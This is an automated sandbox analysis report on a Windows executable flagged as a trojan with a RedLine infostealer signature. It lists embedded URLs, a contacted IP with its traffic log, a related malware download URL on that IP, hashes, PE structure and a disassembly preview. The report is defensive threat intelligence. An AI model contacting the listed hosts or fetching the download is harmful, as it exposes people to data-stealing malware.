http://www.adicon.com.cn/DeleteGPGFileT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/addInspectReqNoXmlT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/getPatResultT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://com.wondersgroup.jkda.application.modules.webserviceT	BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/DownloadReportByPersonIDT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetSearchByteSampleAiT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/ReportDetailT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/DownloadBarCodeCancelT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/DownLoadReportFormPDFByAccountPassWordT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/DownloadReportByBarcodeNoT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/DownLoadReportForm_PKIT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetBLTCTPicT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetJSONReportItemListByAdiconBarocdeT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/UpLoadReportFromBytesT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/AppTrackDownT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/$	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetReportDetailByXmlDocumentT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/UpdatesSetDownT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/AppUpLoadDeleteT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/DownLoadReportFormIDT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetByteReportByYYtmT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.104.173.216	unknown	China		37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1448043
Start date and time:	2024-05-27 15:22:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BaGkRDSifo.exe renamed because original name is a hash value
Original Sample Name:	3b8f605388479cd9296e0be1ea9d1f60.exe
Detection:	MAL
Classification:	mal80.troj.evad.winEXE@1/2@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 90 Number of non-executed functions: 46
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:23:01	API Interceptor	2834698x Sleep call for process: BaGkRDSifo.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
47.104.173.216	msjYmnMpqK.exe	Get hash	malicious	Unknown	Browse	47.104.173.216:8081/STHealthUpdate.exe
47.104.173.216	msjYmnMpqK.exe	Get hash	malicious	Unknown	Browse	47.104.173.216:8081/STHealthUpdate.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	nzKl7TpAyk.elf	Get hash	malicious	Unknown	Browse	121.41.250.192
	hZ80PhOmKK.elf	Get hash	malicious	Unknown	Browse	223.7.75.82
	Mt5VyD087r.elf	Get hash	malicious	Mirai	Browse	47.99.61.19
	om4SVF6n0I.elf	Get hash	malicious	Mirai	Browse	47.100.90.123
	o77HTF1NHp.elf	Get hash	malicious	Unknown	Browse	47.114.199.46
	M4huqujaBY.elf	Get hash	malicious	Unknown	Browse	47.97.125.101
	3LI2VAvf26.elf	Get hash	malicious	Unknown	Browse	182.94.124.102
	1Tkf1dTh5K.dll	Get hash	malicious	Unknown	Browse	47.110.247.171
	uCLkYbZQoA.exe	Get hash	malicious	Unknown	Browse	47.110.247.171
	1Tkf1dTh5K.dll	Get hash	malicious	Unknown	Browse	47.110.247.171

Process:	C:\Users\user\Desktop\BaGkRDSifo.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	243200
Entropy (8bit):	7.305392631454974
Encrypted:	false
SSDEEP:	6144:GDKW1Lgbdl0TBBvjc/n9dNAC6dM3KoUG808Z:gh1Lk70TnvjcTmC6sdR80K
MD5:	341A6645505C8EAF54EC83738067D0C8
SHA1:	EE06B6C55D3671090BCF1F5D711D3FA3AADC98CB
SHA-256:	229C201DE7A746E65ACB6552198ABA51FA153619CB4F29DE0AF15CB3F2E1F7D0
SHA-512:	75748565211164F0681EF42C68B2EF1B0B1BE27C39D084676AD9C8036EC8532919D318088FCEDCF501308E807E874AC62593C654E44F5131AF0892B368F6DE43
Malicious:	true
Yara Hits:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\Desktop\STHealthUpdate.exe, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~.................iTf....PE..L...t..P..........#................./.............@..................................;..........................................P....`..................................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\Update\server.txt

Download File

Process:	C:\Users\user\Desktop\BaGkRDSifo.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	12
Entropy (8bit):	2.584962500721156
Encrypted:	false
SSDEEP:	3:MjQ:MjQ
MD5:	67D2CD3C90B556213462666F92C17F06
SHA1:	160B61EF0BBB7D022DEC1CEB02D3DC10044A94B9
SHA-256:	400E4A5E0E1D32437451BA59B4EF46DDC19B8C49B85B73C7B1EFC60D7E193C02
SHA-512:	35A4A04900178B1918DBA122A47F0755DE26FEDA9C027EA5D7946A43E91A9CBFB8CF031E4F6C79B76EB57A323E41223C892DCC104CD1EB1683950A7A4DEDFC5A
Malicious:	false
Reputation:	low
Preview:	3.24.05.27.5

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.992117526237163
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BaGkRDSifo.exe
File size:	3'972'096 bytes
MD5:	3b8f605388479cd9296e0be1ea9d1f60
SHA1:	4608fd9d55cae50eaa9379b02373afea15572eae
SHA256:	d550397a71e1fc77be3460d1742f1df63d43ba74487a10ec96befc1c768768bc
SHA512:	46e4a7f6add48902ead4287ce2cadceb420fcb40265563036d29a327653c238607e8780955e7f4b06e4ab7e51ed8a752e7ad9fa1447f3774f217106770d68773
SSDEEP:	98304:waTZTvvywkGs93MqS8sbyTrtUQ4UYHGVvIx0qq85sXoz:w6bvyTGsJhsbwGUcGVWsXE
TLSH:	72063344B195C733D4B94E3080C5DFAD86A935720BEE605FA4F4326AAD219D3B278BC7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~.................iTf....PE..L...t..P..........#........

File Icon


Icon Hash:	072919949c39230f

Static PE Info

General

Entrypoint:	0x40cd2f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5000A574 [Fri Jul 13 22:47:16 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	bf5a4aa99e5b160f8521cadd6bfe73b8

Entrypoint Preview

Instruction
call 00007F353CBDB606h
jmp 00007F353CBD57C9h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0041F058h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F353CBD592Eh
test byte ptr [eax], 00000008h
je 00007F353CBD5929h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [0041B000h]
leave
retn 0008h
ret
mov eax, 00413563h
mov dword ptr [004228E4h], eax
mov dword ptr [004228E8h], 00412C4Ah
mov dword ptr [004228ECh], 00412BFEh
mov dword ptr [004228F0h], 00412C37h
mov dword ptr [004228F4h], 00412BA0h
mov dword ptr [004228F8h], eax
mov dword ptr [004228FCh], 004134DBh
mov dword ptr [00422900h], 00412BBCh
mov dword ptr [00422904h], 00412B1Eh
mov dword ptr [00422908h], 00412AABh
ret
mov edi, edi
push ebp
mov ebp, esp
call 00007F353CBD58BBh
call 00007F353CBDC140h
cmp dword ptr [ebp+00h], 00000000h

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[ C ] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x215b4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x26000	0x3a7a9c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1b1c0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x20da0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1b000	0x184	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x19718	0x19800	67bb7b7ee02b8ad3cdac5501a71675e2	False	0.5789675245098039	data	6.7485790680728055	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1b000	0x6db4	0x6e00	5826801f33fc1b607aa8e942aa92e9fa	False	0.5467329545454546	data	6.442956247632331	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x22000	0x30c0	0x1600	2fe51a72ede820cd7cf55a77ba59b1f4	False	0.3126775568181818	data	3.2625868398009703	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x26000	0x3a7a9c	0x3a7c00	887fed7706466c31f6d553bf3a6de6e3	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x261b4	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5906 x 5906 px/m	0.5351913084553613
RT_RCDATA	0x2a3dc	0x3a3151	data	1.0003108978271484
RT_RCDATA	0x3cd530	0x20	data	1.34375
RT_GROUP_ICON	0x3cd550	0x14	data	1.1
RT_VERSION	0x3cd564	0x34c	data	0.41113744075829384
RT_MANIFEST	0x3cd8b0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
KERNEL32.dll	RaiseException, GetLastError, MultiByteToWideChar, lstrlenA, InterlockedDecrement, GetProcAddress, LoadLibraryA, FreeResource, SizeofResource, LockResource, LoadResource, FindResourceA, GetModuleHandleA, Module32Next, CloseHandle, Module32First, CreateToolhelp32Snapshot, GetCurrentProcessId, SetEndOfFile, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, GetLocaleInfoA, HeapFree, GetProcessHeap, HeapAlloc, GetCommandLineA, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, ReadFile, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, FlushFileBuffers, SetFilePointer, SetHandleCount, GetFileType, GetStartupInfoA, RtlUnwind, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CompareStringA, CompareStringW, SetEnvironmentVariableA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
ole32.dll	OleInitialize
OLEAUT32.dll	SafeArrayCreate, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SafeArrayCreateVector, VariantClear, VariantInit, SysFreeString, SysAllocString

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2024 15:23:00.627278090 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:00.632333040 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:00.632467031 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:00.637504101 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:00.642450094 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:01.572685003 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:01.625286102 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:01.644777060 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:01.650099993 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:01.973798037 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:01.973845959 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:01.973882914 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:01.973946095 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.015887022 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.221919060 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.221986055 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.222026110 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.222049952 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.222059965 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.222098112 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.222157001 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.428642035 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.428690910 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.428747892 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.428767920 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.428805113 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.428838968 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.428874016 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.428888083 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.428909063 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.428921938 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.429507971 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.429609060 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.429642916 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.429660082 CEST	49701	9876	192.168.2.7	47.104.173.216
